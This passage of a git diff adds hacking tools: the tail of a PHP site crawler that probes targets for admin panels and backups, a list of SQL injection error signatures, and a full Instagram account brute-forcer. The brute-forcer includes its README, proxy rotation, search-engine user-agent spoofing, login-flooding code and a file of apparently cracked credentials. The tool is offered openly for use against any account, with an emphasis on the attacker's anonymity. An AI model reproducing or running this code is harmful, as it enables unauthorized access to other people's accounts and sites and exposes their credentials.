+ } + elseif ($httpCode == 404) + { + } + else + { + echo "\n\n[U] $url : "; + echo "HTTP Response: " . $httpCode; + } + curl_close($handle); + } + } + else + { + echo "\n File Not Found, Aborting Crawl ....\n"; + } + if (file_exists("crawl/backup.ini")) + { + echo "\n[-] Backup Crawler File Found! Scanning For Site Backups [-]\n"; + $crawllnk = file_get_contents("crawl/backup.ini"); + $crawls = explode(',', $crawllnk); + echo "\nURLs Loaded: " . count($crawls) . "\n\n"; + foreach ($crawls as $crawl) + { + $url = $ipsl . $ip . "/" . $crawl; + $handle = curl_init($url); + curl_setopt($handle, CURLOPT_RETURNTRANSFER, TRUE); + $response = curl_exec($handle); + $httpCode = curl_getinfo($handle, CURLINFO_HTTP_CODE); + if ($httpCode == 200) + { + echo "\n\n[U] $url : "; + echo "Found!"; + } + elseif ($httpCode == 404) + { + } + else + { + echo "\n\n[U] $url : "; + echo "HTTP Response: " . $httpCode; + } + curl_close($handle); + } + } + else + { + echo "\n File Not Found, Aborting Crawl ....\n"; + } + if (file_exists("crawl/others.ini")) + { + echo "\n[-] General Crawler File Found! Crawling The Site [-]\n"; + $crawllnk = file_get_contents("crawl/others.ini"); + $crawls = explode(',', $crawllnk); + echo "\nURLs Loaded: " . count($crawls) . "\n\n"; + foreach ($crawls as $crawl) + { + $url = $ipsl . $ip . "/" . $crawl; + $handle = curl_init($url); + curl_setopt($handle, CURLOPT_RETURNTRANSFER, TRUE); + $response = curl_exec($handle); + $httpCode = curl_getinfo($handle, CURLINFO_HTTP_CODE); + if ($httpCode == 200) + { + echo "\n\n[U] $url : "; + echo "Found!"; + } + elseif ($httpCode == 404) + { + } + else + { + echo "\n\n[U] $url : "; + echo "HTTP Response: " . $httpCode; + } + curl_close($handle); + } + } + else + { + echo "\n File Not Found, Aborting Crawl ....\n"; + } + } + elseif ($ctype == "69") + { + echo "\n\t -[ B A S I C C R A W L I N G ]-\n"; + echo "\n\n"; + echo "\n Loading Crawler File ....\n"; + if (file_exists("crawl/admin.ini")) + { + echo "\n[-] Admin Crawler File Found! Scanning For Admin Pannel [-]\n"; + $crawllnk = file_get_contents("crawl/admin.ini"); + $crawls = explode(',', $crawllnk); + echo "\nURLs Loaded: " . count($crawls) . "\n\n"; + foreach ($crawls as $crawl) + { + $url = $ipsl . $ip . "/" . $crawl; + $handle = curl_init($url); + curl_setopt($handle, CURLOPT_RETURNTRANSFER, TRUE); + $response = curl_exec($handle); + $httpCode = curl_getinfo($handle, CURLINFO_HTTP_CODE); + if ($httpCode == 200) + { + echo "\n\n[U] $url : "; + echo "Found!"; + } + elseif ($httpCode == 404) + { + } + else + { + echo "."; + } + curl_close($handle); + } + } + else + { + echo "\n File Not Found, Aborting Crawl ....\n"; + } + if (file_exists("crawl/backup.ini")) + { + echo "\n[-] Backup Crawler File Found! Scanning For Site Backups [-]\n"; + $crawllnk = file_get_contents("crawl/backup.ini"); + $crawls = explode(',', $crawllnk); + echo "\nURLs Loaded: " . count($crawls) . "\n\n"; + foreach ($crawls as $crawl) + { + $url = $ipsl . $ip . "/" . $crawl; + $handle = curl_init($url); + curl_setopt($handle, CURLOPT_RETURNTRANSFER, TRUE); + $response = curl_exec($handle); + $httpCode = curl_getinfo($handle, CURLINFO_HTTP_CODE); + if ($httpCode == 200) + { + echo "\n\n[U] $url : "; + echo "Found!"; + } + elseif ($httpCode == 404) + { + } + curl_close($handle); + } + } + else + { + echo "\n File Not Found, Aborting Crawl ....\n"; + } + if (file_exists("crawl/others.ini")) + { + echo "\n[-] General Crawler File Found! Crawling The Site [-]\n"; + $crawllnk = file_get_contents("crawl/others.ini"); + $crawls = explode(',', $crawllnk); + echo "\nURLs Loaded: " . count($crawls) . "\n\n"; + foreach ($crawls as $crawl) + { + $url = $ipsl . $ip . "/" . $crawl; + $handle = curl_init($url); + curl_setopt($handle, CURLOPT_RETURNTRANSFER, TRUE); + $response = curl_exec($handle); + $httpCode = curl_getinfo($handle, CURLINFO_HTTP_CODE); + if ($httpCode == 200) + { + echo "\n\n[U] $url : "; + echo "Found!"; + } + elseif ($httpCode == 404) + { + } + curl_close($handle); + } + } + else + { + echo "\n File Not Found, Aborting Crawl ....\n"; + } + } + else + { + goto csel; + } + } + } + } +?> diff --git a/redhawk/sqlerrors.ini b/redhawk/sqlerrors.ini new file mode 100644 index 0000000..9249373 --- /dev/null +++ b/redhawk/sqlerrors.ini @@ -0,0 +1 @@ +You have an error in your SQL syntax,supplied argument is not a valid MySQL result resource,check the manual that corresponds to your MySQL,mysql_fetch_array(),supplied argument is not a valid MySQL,function fetch_row(),Microsoft OLE DB Provider for ODBC Drivers error diff --git a/redhawk/var.php b/redhawk/var.php new file mode 100644 index 0000000..fe210c4 --- /dev/null +++ b/redhawk/var.php @@ -0,0 +1,44 @@ + diff --git a/redhawk/version.txt b/redhawk/version.txt new file mode 100644 index 0000000..227cea2 --- /dev/null +++ b/redhawk/version.txt @@ -0,0 +1 @@ +2.0.0 diff --git a/tools/Instagram/Executable/instagram.py b/tools/Instagram/Executable/instagram.py new file mode 100644 index 0000000..b953c68 --- /dev/null +++ b/tools/Instagram/Executable/instagram.py @@ -0,0 +1,149 @@ +# Date: 12/29/2018 +# Author: Mohamed +# Description: Instagram bruter + +from sys import exit +from os.path import exists +from lib.bruter import Bruter +from lib.display import Display +from lib.const import credentials, modes + + +class Engine(object): + + def __init__(self, username, threads, passlist_path): + self.bruter = None + self.resume = False + self.is_alive = True + self.threads = threads + self.username = username + self.display = Display() + self.passlist_path = passlist_path + + def create_bruter(self): + self.bruter = Bruter(self.username, self.threads, + self.passlist_path) + + def get_user_resp(self): + return self.display.prompt('Would you like to resume the attack? [y/n]: ') + + def write_to_file(self, password): + with open(credentials, 'at') as f: + data = 'Username: {}\nPassword: {}\n\n'.format( + self.username.title(), password) + f.write(data) + + def start(self): + + self.create_bruter() + + while self.is_alive and not self.bruter.password_manager.session: + pass + + if not self.is_alive: + return + + if self.bruter.password_manager.session.exists: + try: + resp = self.get_user_resp() + except: + self.is_alive = False + + if resp and self.is_alive: + if resp.strip().lower() == 'y': + self.bruter.password_manager.resume = True + + try: + self.bruter.start() + except KeyboardInterrupt: + self.bruter.stop() + self.bruter.display.shutdown(self.bruter.last_password, + self.bruter.password_manager.attempts, len(self.bruter.browsers)) + finally: + self.stop() + + def stop(self): + if self.is_alive: + + self.bruter.stop() + self.is_alive = False + + if self.bruter.password_manager.is_read and not self.bruter.is_found and not self.bruter.password_manager.list_size: + self.bruter.display.stats_not_found(self.bruter.last_password, + self.bruter.password_manager.attempts, len(self.bruter.browsers)) + + if self.bruter.is_found: + self.write_to_file(self.bruter.password) + self.bruter.display.stats_found(self.bruter.password, + self.bruter.password_manager.attempts, len(self.bruter.browsers)) + + +def args(): + enable_colors = str(input('Enable colors? (default: y) [y/n]: ')) + + if not enable_colors: + enable_colors = True + else: + if enable_colors[0].lower() == 'n': + enable_colors = False + + display = Display(is_color=enable_colors) + username = display.prompt('Enter a username: ') + + if not username: + display.warning('You can\'t leave this field empty') + display.wait() + exit() + + passlist = display.prompt('Enter the path to your password list: ') + + if not exists(passlist): + display.warning('Invalid path to password list', False) + display.wait() + exit() + + display.info('''Modes:\r + 0: => 512 passwords at a time + 1: => 256 passwords at a time + 2: => 128 passwords at a time + 3: => 64 passwords at a time + ''', False) + + mode = display.prompt('Select a mode [0, 1, 2, 3]: ', False) + + if not mode.isdigit(): + display.warning('Mode must be a number', False) + display.wait() + exit() + + mode = int(mode) + + if int(mode) > 3: + display.warning('Mode must be no more than 3', False) + display.wait() + exit() + + if int(mode) < 0: + display.warning('Mode must bot no less than 0', False) + display.wait() + exit() + + return [username, passlist, mode] + + +if __name__ == '__main__': + try: + user_input = args() + except KeyboardInterrupt: + exit() + + display = Display() + username, passlist, mode = user_input + + try: + Engine(username, modes[mode], passlist).start() + except: + pass + finally: + display.wait() + exit() diff --git a/tools/Instagram/LICENSE b/tools/Instagram/LICENSE new file mode 100644 index 0000000..f9d08a3 --- /dev/null +++ b/tools/Instagram/LICENSE @@ -0,0 +1,21 @@ +MIT License + +Copyright (c) 2018 Mohamed + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. diff --git a/tools/Instagram/README.md b/tools/Instagram/README.md new file mode 100644 index 0000000..51aff58 --- /dev/null +++ b/tools/Instagram/README.md @@ -0,0 +1,124 @@ +# Instagram Bruter + +[![Version](https://img.shields.io/badge/version-v2.1.1-blue.svg)]() +[![Python](https://img.shields.io/badge/python-v3-blue.svg)]() +[![Discord](https://img.shields.io/discord/532621311017484307.svg)](https://discord.gg/jvhJMeb) +[![Donate](https://img.shields.io/badge/paypal-donate-yellow.svg)](https://www.paypal.me/Msheikh03) +
+**Bitcoin wallet:** 3Kr5C9t9HWwPfqzSNXeBNyRvJWw9sSLeKy +
+ +This program will brute force any Instagram account you send it its way. Just give it a target, a password list and a mode then press enter and forget about it. No need to worry about anonymity when using this program, its highest priority is your anonymity, it only attacks when your identity is hidden. + +# NOTICE + +This project is no longer maintained; use version 3.0.0 at [here](https://github.com/Pure-L0G1C/Insta) + +### Requirements + +- Python _v3.x.x_ +- ~~Kali Linux 2.0~~ +- ~~TOR~~ + +### Install Dependencies + +``` +pip3 install -r requirements.txt +``` + +### Help + +``` +C:\Users\Mohamed\Desktop\Instagram>python3 instagram.py -h +usage: instagram.py [-h] [-m MODE] username wordlist + +positional arguments: + username email or username + wordlist password list + +optional arguments: + -h, --help show this help message and exit + -m MODE, --mode MODE modes: 0 => 32 bots; 1 => 16 bots; 2 => 8 bots; 3 => 4 bots +``` + +### Usage + +``` +python3 instagram.py -m +``` + +### Bots(Threads) + +- 4 bots: 64 passwords at a time +- 8 bots: 128 passwords at a time +- 16 bots: 256 passwords at a time +- 32 bots: 512 passwords at a time + +### Modes + +- 0: 32 bots +- 1: 16 bots +- 2: 8 bots +- 3: 4 bots + +### Chill mode + +This mode uses only 4 bots, or 64 passwords at a time. + +``` +C:\Users\Mohamed\Desktop\Instagram>python3 instagram.py Sami09.1 pass.lst -m 3 +``` + +### Moderate mode 1 + +This mode uses 8 bots, or 128 passwords at a time. + +``` +C:\Users\Mohamed\Desktop\Instagram>python3 instagram.py Sami09.1 pass.lst -m 2 +``` + +### Moderate mode 2 + +This mode uses 16 bots, or 256 passwords at a time. + +``` +C:\Users\Mohamed\Desktop\Instagram>python3 instagram.py Sami09.1 pass.lst -m 1 +``` + +### Savage mode + +This mode uses 32 bots, or 512 passwords at a time. + +``` +C:\Users\Mohamed\Desktop\Instagram>python3 instagram.py Sami09.1 pass.lst -m 0 +``` + +### If you don't specify a mode, then mode is set to 2 + +### Run + +``` +[-] Wordlist: pass.lst +[-] Username: Sami09.1 +[-] Password: 272 +[-] Complete: 45.51% +[-] Attempts: 228 +[-] Browsers: 273 +[-] Exists: True +``` + +### Stop + +``` +[-] Wordlist: pass.lst +[-] Username: Sami09.1 +[-] Password: Sami123 +[-] Complete: 62.67% +[-] Attempts: 314 +[-] Browsers: 185 +[-] Exists: True + +[!] Password Found +[+] Username: Sami09.1 +[+] Password: Sami123 +``` diff --git a/tools/Instagram/accounts.txt b/tools/Instagram/accounts.txt new file mode 100644 index 0000000..d9c4e02 --- /dev/null +++ b/tools/Instagram/accounts.txt @@ -0,0 +1,6 @@ +Username: Tuf_Unkn0Wn +Password: 1NST4gr4mUN_KN0WNbaliP4SS + +Username: Tuf_Unkn0Wn +Password: 1NST4gr4mUN_KN0WNbaliP4SS + diff --git a/tools/Instagram/database/session.db b/tools/Instagram/database/session.db new file mode 100644 index 0000000..52266e3 Binary files /dev/null and b/tools/Instagram/database/session.db differ diff --git a/tools/Instagram/instagram.py b/tools/Instagram/instagram.py new file mode 100644 index 0000000..2840aa8 --- /dev/null +++ b/tools/Instagram/instagram.py @@ -0,0 +1,132 @@ +# Date: 12/29/2018 +# Author: Mohamed +# Description: Instagram bruter + +from sys import exit +from os.path import exists +from lib.bruter import Bruter +from lib.display import Display +from platform import python_version +from lib.const import credentials, modes +from argparse import ArgumentParser, ArgumentTypeError + + +class Engine(object): + + def __init__(self, username, threads, passlist_path, is_color): + self.bruter = None + self.resume = False + self.is_alive = True + self.threads = threads + self.username = username + self.passlist_path = passlist_path + self.display = Display(is_color=is_color) + + def passlist_path_exists(self): + if not exists(self.passlist_path): + self.display.warning('Invalid path to password list') + return False + return True + + def create_bruter(self): + self.bruter = Bruter( + self.username, + self.threads, + self.passlist_path + ) + + def get_user_resp(self): + return self.display.prompt('Would you like to resume the attack? [y/n]: ') + + def write_to_file(self, password): + with open(credentials, 'at') as f: + data = 'Username: {}\nPassword: {}\n\n'.format( + self.username.title(), password) + f.write(data) + + def start(self): + if not self.passlist_path_exists(): + self.is_alive = False + + if self.is_alive: + self.create_bruter() + + while self.is_alive and not self.bruter.password_manager.session: + pass + + if not self.is_alive: + return + + if self.bruter.password_manager.session.exists: + try: + resp = self.get_user_resp() + except: + self.is_alive = False + + if resp and self.is_alive: + if resp.strip().lower() == 'y': + self.bruter.password_manager.resume = True + + try: + self.bruter.start() + except KeyboardInterrupt: + self.bruter.stop() + self.bruter.display.shutdown(self.bruter.last_password, + self.bruter.password_manager.attempts, len(self.bruter.browsers)) + finally: + self.stop() + + def stop(self): + if self.is_alive: + + self.bruter.stop() + self.is_alive = False + + if self.bruter.password_manager.is_read and not self.bruter.is_found and not self.bruter.password_manager.list_size: + self.bruter.display.stats_not_found(self.bruter.last_password, + self.bruter.password_manager.attempts, len(self.bruter.browsers)) + + if self.bruter.is_found: + self.write_to_file(self.bruter.password) + self.bruter.display.stats_found(self.bruter.password, + self.bruter.password_manager.attempts, len(self.bruter.browsers)) + + +def valid_int(n): + if not n.isdigit(): + raise ArgumentTypeError('mode must be a number') + + n = int(n) + + if n > 3: + raise ArgumentTypeError('maximum for a mode is 3') + + if n < 0: + raise ArgumentTypeError('minimum for a mode is 0') + + return n + + +def args(): + args = ArgumentParser() + args.add_argument('username', help='email or username') + args.add_argument('passlist', help='password list') + args.add_argument('-nc', '--no-color', dest='color', + action='store_true', help='disable colors') + args.add_argument('-m', '--mode', default=2, type=valid_int, + help='modes: 0 => 32 bots; 1 => 16 bots; 2 => 8 bots; 3 => 4 bots') + return args.parse_args() + + +if __name__ == '__main__': + + if int(python_version()[0]) < 3: + print('[!] Please use Python 3') + exit() + + arugments = args() + mode = arugments.mode + username = arugments.username + passlist = arugments.passlist + is_color = True if not arugments.color else False + Engine(username, modes[mode], passlist, is_color).start() diff --git a/tools/Instagram/lib/__init__.py b/tools/Instagram/lib/__init__.py new file mode 100644 index 0000000..c30328c --- /dev/null +++ b/tools/Instagram/lib/__init__.py @@ -0,0 +1,2 @@ +# Date: 12/30/2018 +# Author: Mohamed diff --git a/tools/Instagram/lib/bad_proxies.py b/tools/Instagram/lib/bad_proxies.py new file mode 100644 index 0000000..d27bcbe --- /dev/null +++ b/tools/Instagram/lib/bad_proxies.py @@ -0,0 +1,24 @@ +# Date: 12/29/2018 +# Author: Mohamed +# Description: Manages bad proxies + +from .const import max_bad_proxies + + +class BadProxies(object): + + def __init__(self): + self.proxies = [] + + def __contains__(self, proxy): + for _proxy in self.proxies: + if _proxy.ip == proxy.ip and _proxy.port == proxy.port: + return True + return False + + def append(self, proxy): + if len(self.proxies) >= max_bad_proxies: + self.proxies.pop(0) + + self.proxies.append(proxy) + diff --git a/tools/Instagram/lib/browser.py b/tools/Instagram/lib/browser.py new file mode 100644 index 0000000..d3aefea --- /dev/null +++ b/tools/Instagram/lib/browser.py @@ -0,0 +1,127 @@ +# Date: 12/28/2018 +# Author: Mohamed +# Description: Browser + +from time import time +from random import choice +from requests import Session +from .const import browser_data, response_codes, fetch_time, user_agents, debug + + +class Browser(object): + + account_exists = None + + def __init__(self, username, password, proxy): + self.proxy = proxy + self.is_found = False + self.is_active = True + self.is_locked = False + self.start_time = None + self.browser = self.br() + self.username = username + self.password = password + self.is_attempted = False + + def br(self): + header = browser_data['header'] + header['user-agent'] = choice(user_agents) + + session = Session() + session.headers.update(header) + session.proxies.update(self.proxy.addr) + return session + + def get_token(self): + token = None + try: + token = self.browser.get( + browser_data['home_url'], timeout=fetch_time).cookies.get_dict()['csrftoken'] + + self.browser.headers.update({ + 'cookie': 'mid=XLzTtAALAAEb-Sz-JUGbyLphzGmc; csrftoken={}; rur={}'.format( + token, self.browser.cookies.get_dict()['rur'] + ) + }) + except: + pass + finally: + return token + + def post_data(self): + response = None + data = {browser_data['username_field']: self.username, + browser_data['password_field']: self.password} + + try: + response = self.browser.post( + browser_data['login_url'], data=data, timeout=fetch_time).json() + except: + pass + finally: + return response + + def check_exists(self, response): + if 'user' in response: + Browser.account_exists = response['user'] + + def check_response(self, response): + if 'authenticated' in response: + if response['authenticated']: + return response_codes['succeed'] + + if 'message' in response: + if response['message'] == 'checkpoint_required': + return response_codes['succeed'] + + if response['status'] == 'fail': + return response_codes['locked'] + + if 'errors' in response: + return response_codes['locked'] + + return response_codes['failed'] + + def authenicate(self): + response = self.post_data() + resp = {'attempted': False, 'accessed': False, 'locked': False} + + if debug: + print('pass: {} => {}'.format(self.password, response)) + + if response: + resp['attempted'] = True + resp_code = self.check_response(response) + + if resp_code == response_codes['locked']: + resp['locked'] = True + + if resp_code == response_codes['succeed']: + resp['accessed'] = True + + if Browser.account_exists == None: + self.check_exists(response) + + return resp + + def attempt(self): + self.start_time = time() + token = self.get_token() + + if token: + self.browser.headers.update({'x-csrftoken': token}) + resp = self.authenicate() + + if resp['attempted']: + self.is_attempted = True + + if not resp['locked']: + if resp['accessed']: + self.is_found = True + else: + self.is_locked = True + self.close() + + def close(self): + self.browser.close() + self.is_active = False diff --git a/tools/Instagram/lib/bruter.py b/tools/Instagram/lib/bruter.py new file mode 100644 index 0000000..f21269b --- /dev/null +++ b/tools/Instagram/lib/bruter.py @@ -0,0 +1,176 @@ +# Date: 12/28/2018 +# Author: Mohamed +# Description: Bruter + +from time import time, sleep +from lib.browser import Browser +from lib.display import Display +from threading import Thread, RLock +from lib.proxy_manager import ProxyManager +from lib.password_manager import PasswordManager +from lib.const import max_time_to_wait, max_bots_per_proxy + + +class Bruter(object): + + def __init__(self, username, threads, passlist_path): + self.browsers = [] + self.lock = RLock() + self.password = None + self.is_alive = True + self.is_found = False + self.bots_per_proxy = 0 + self.username = username + self.last_password = None + self.active_passwords = [] + self.proxy_manager = ProxyManager() + self.display = Display(username, passlist_path) + self.password_manager = PasswordManager(username, + passlist_path, threads, self.display) + + def manage_session(self): + if self.password_manager.is_read: + if not self.password_manager.list_size or self.is_found: + self.password_manager.session.delete() + else: + if self.is_found: + self.password_manager.session.delete() + else: + self.password_manager.session.write(self.password_manager.attempts, + self.password_manager.passlist) + + def browser_manager(self): + while self.is_alive: + + for browser in self.browsers: + + if not self.is_alive: + break + + if Display.account_exists == None and Browser.account_exists != None: + Display.account_exists = Browser.account_exists + + if not browser.is_active: + + password = browser.password + + if browser.is_attempted and not browser.is_locked: + + if browser.is_found and not self.is_found: + self.password = password + self.is_found = True + + with self.lock: + self.password_manager.list_remove(password) + else: + with self.lock: + self.proxy_manager.bad_proxy(browser.proxy) + + self.remove_browser(browser) + + else: + if browser.start_time: + if time() - browser.start_time >= max_time_to_wait: + browser.close() + + def remove_browser(self, browser): + if browser in self.browsers: + with self.lock: + self.browsers.pop(self.browsers.index(browser)) + self.active_passwords.pop( + self.active_passwords.index(browser.password) + ) + + def attack(self): + proxy = None + is_attack_started = False + while self.is_alive: + + browsers = [] + for password in self.password_manager.passlist: + + if not self.is_alive: + break + + if not proxy: + proxy = self.proxy_manager.get_proxy() + self.bots_per_proxy = 0 + + if self.bots_per_proxy >= max_bots_per_proxy: + proxy = None + + if not proxy: + continue + + if not password in self.active_passwords and password in self.password_manager.passlist: + browser = Browser(self.username, password, proxy) + browsers.append(browser) + self.bots_per_proxy += 1 + + if not is_attack_started: + self.display.info('Starting attack ...') + is_attack_started = True + + with self.lock: + self.browsers.append(browser) + self.active_passwords.append(password) + + for browser in browsers: + thread = Thread(target=browser.attempt) + thread.daemon = True + try: + thread.start() + except: + self.remove_browser(browser) + + def start_daemon_threads(self): + attack = Thread(target=self.attack) + browser_manager = Thread(target=self.browser_manager) + proxy_manager = Thread(target=self.proxy_manager.start) + password_manager = Thread(target=self.password_manager.start) + + attack.daemon = True + proxy_manager.daemon = True + browser_manager.daemon = True + password_manager.daemon = True + + attack.start() + proxy_manager.start() + browser_manager.start() + password_manager.start() + + self.display.info('Searching for proxies ...') + + def stop_daemon_threads(self): + self.proxy_manager.stop() + self.password_manager.stop() + + def start(self): + self.display.info('Initiating daemon threads ...') + self.start_daemon_threads() + + last_attempt = 0 + while self.is_alive and not self.is_found: + + if last_attempt == self.password_manager.attempts and self.password_manager.attempts: + sleep(1.5) + continue + + for browser in self.browsers: + + self.display.stats( + browser.password, self.password_manager.attempts, len(self.browsers)) + last_attempt = self.password_manager.attempts + self.last_password = browser.password + + if not self.is_alive or self.is_found: + break + + if self.password_manager.is_read and not self.password_manager.list_size and not len(self.browsers): + self.is_alive = False + + def stop(self): + self.is_alive = False + self.manage_session() + self.stop_daemon_threads() + self.password_manager.session.is_busy = False diff --git a/tools/Instagram/lib/const.py b/tools/Instagram/lib/const.py new file mode 100644 index 0000000..a2cfc84 --- /dev/null +++ b/tools/Instagram/lib/const.py @@ -0,0 +1,76 @@ +# Date: 12/28/2018 +# Author: Mohamed +# Description: Constants + +import os + +# User agents +user_agents = [ + 'Googlebot/2.1 (+http://www.google.com/bot.html)', + 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', + 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', + 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36', + 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview Analytics) Chrome/27.0.1453 Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', + 'Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/537.36 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', + 'Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', + 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', + 'Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', + 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', + + + 'Mozilla/5.0 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)', + 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', + 'Mozilla/5.0 (compatible; adidxbot/2.0; http://www.bing.com/bingbot.htm)', + 'Mozilla/5.0 (compatible; adidxbot/2.0; +http://www.bing.com/bingbot.htm)', + 'Mozilla/5.0 (seoanalyzer; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', + 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) SitemapProbe', + 'Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; NOKIA; Lumia 530) like Gecko (compatible; adidxbot/2.0; +http://www.bing.com/bingbot.htm)', + 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; adidxbot/2.0; http://www.bing.com/bingbot.htm)', + 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; adidxbot/2.0; +http://www.bing.com/bingbot.htm)', + 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)', + 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', +] + +# Browser +header = { + 'x-ig-app-id': '936619743392459', + 'x-instagram-ajax': '2f6bf8b37c04', + 'x-requested-with': 'XMLHttpRequest', + 'referer': 'https://www.instagram.com/', + 'content-type': 'application/x-www-form-urlencoded' +} + +username_field = 'username' +password_field = 'password' +home_url = 'https://www.instagram.com/' +login_url = 'https://www.instagram.com/accounts/login/ajax/' + +browser_data = { + 'header': header, + 'home_url': home_url, + 'login_url': login_url, + 'username_field': username_field, + 'password_field': password_field +} + +# Login +fetch_time = (10, 15) +response_codes = {'succeed': 0, 'failed': 1, 'locked': -1} + +# Limits +max_bad_proxies = 128 +max_time_to_wait = 18 +max_bots_per_proxy = 16 + +# Misc +debug = False +credentials = 'accounts.txt' +modes = {0: 512, 1: 256, 2: 128, 3: 64} + +# Database +db_dir = 'database' +db_session = 'session.db' +db_path = os.path.join(db_dir, db_session) + +if not os.path.exists(db_dir): + os.mkdir(db_dir) diff --git a/tools/Instagram/lib/display.py b/tools/Instagram/lib/display.py new file mode 100644 index 0000000..5f1a1a9 --- /dev/null +++ b/tools/Instagram/lib/display.py @@ -0,0 +1,160 @@ +# 12/29/2018 +# Author: Mohamed +# Description: Display + +from os import system +from time import sleep +from .const import debug +from colorama import Fore +from builtins import input +from platform import system as platform + + +class Display(object): + + __is_color = None + total_lines = None + account_exists = None + + def __init__(self, username=None, passlist=None, is_color=None): + self.delay = 1.3 + self.username = username + self.passlist = passlist + self.colors_disabled = True + self.cls = 'cls' if platform() == 'Windows' else 'clear' + + if Display.__is_color == None: + Display.__is_color = is_color + + def clear(self): + if not debug or self.colors_disabled: + system(self.cls) + + if self.colors_disabled and self.__is_color: + self.colors_disabled = False + else: + print('\n\n') + + def stats(self, password, attempts, browsers, load=True): + self.clear() + complete = round((attempts/Display.total_lines) * 100, 4) + account_exists = self.account_exists if self.account_exists != None else '' + + if self.__is_color: + print('{0}[{1}-{0}] {1}Wordlist: {2}{3}{4}'.format( + Fore.YELLOW, Fore.WHITE, Fore.CYAN, self.passlist, Fore.RESET + )) + + print('{0}[{1}-{0}] {1}Username: {2}{3}{4}'.format( + Fore.YELLOW, Fore.WHITE, Fore.CYAN, self.username.title(), Fore.RESET + )) + + print('{0}[{1}-{0}] {1}Password: {2}{3}{4}'.format( + Fore.YELLOW, Fore.WHITE, Fore.CYAN, password, Fore.RESET + )) + + print('{0}[{1}-{0}] {1}Complete: {2}{3}%{4}'.format( + Fore.YELLOW, Fore.WHITE, Fore.CYAN, complete, Fore.RESET + )) + + print('{0}[{1}-{0}] {1}Attempts: {2}{3}{4}'.format( + Fore.YELLOW, Fore.WHITE, Fore.CYAN, attempts, Fore.RESET + )) + + print('{0}[{1}-{0}] {1}Browsers: {2}{3}{4}'.format( + Fore.YELLOW, Fore.WHITE, Fore.CYAN, browsers, Fore.RESET + )) + + print('{0}[{1}-{0}] {1}Exists: {2}{3}{4}'.format( + Fore.YELLOW, Fore.WHITE, Fore.CYAN, account_exists, Fore.RESET + )) + + else: + print( + f'[-] Wordlist: {self.passlist}\n[-] Username: {self.username}\n[-] Password: {password}') + + print( + f'Complete: {complete}\n[-] Attempts: {attempts}\n[-] Browsers: {browsers}\n[-] Exists: {account_exists}') + + if load: + sleep(self.delay) + + def stats_found(self, password, attempts, browsers): + self.stats(password, attempts, browsers, load=False) + + if self.__is_color: + print('\n{0}[{1}!{0}] {2}Password Found{3}'.format( + Fore.YELLOW, Fore.RED, Fore.WHITE, Fore.RESET + )) + + print('{0}[{1}+{0}] {2}Username: {1}{3}{4}'.format( + Fore.YELLOW, Fore.GREEN, Fore.WHITE, self.username.title(), Fore.RESET + )) + + print('{0}[{1}+{0}] {2}Password: {1}{3}{4}'.format( + Fore.YELLOW, Fore.GREEN, Fore.WHITE, password, Fore.RESET + )) + else: + print('\n[!] Password Found\n[+] Username: 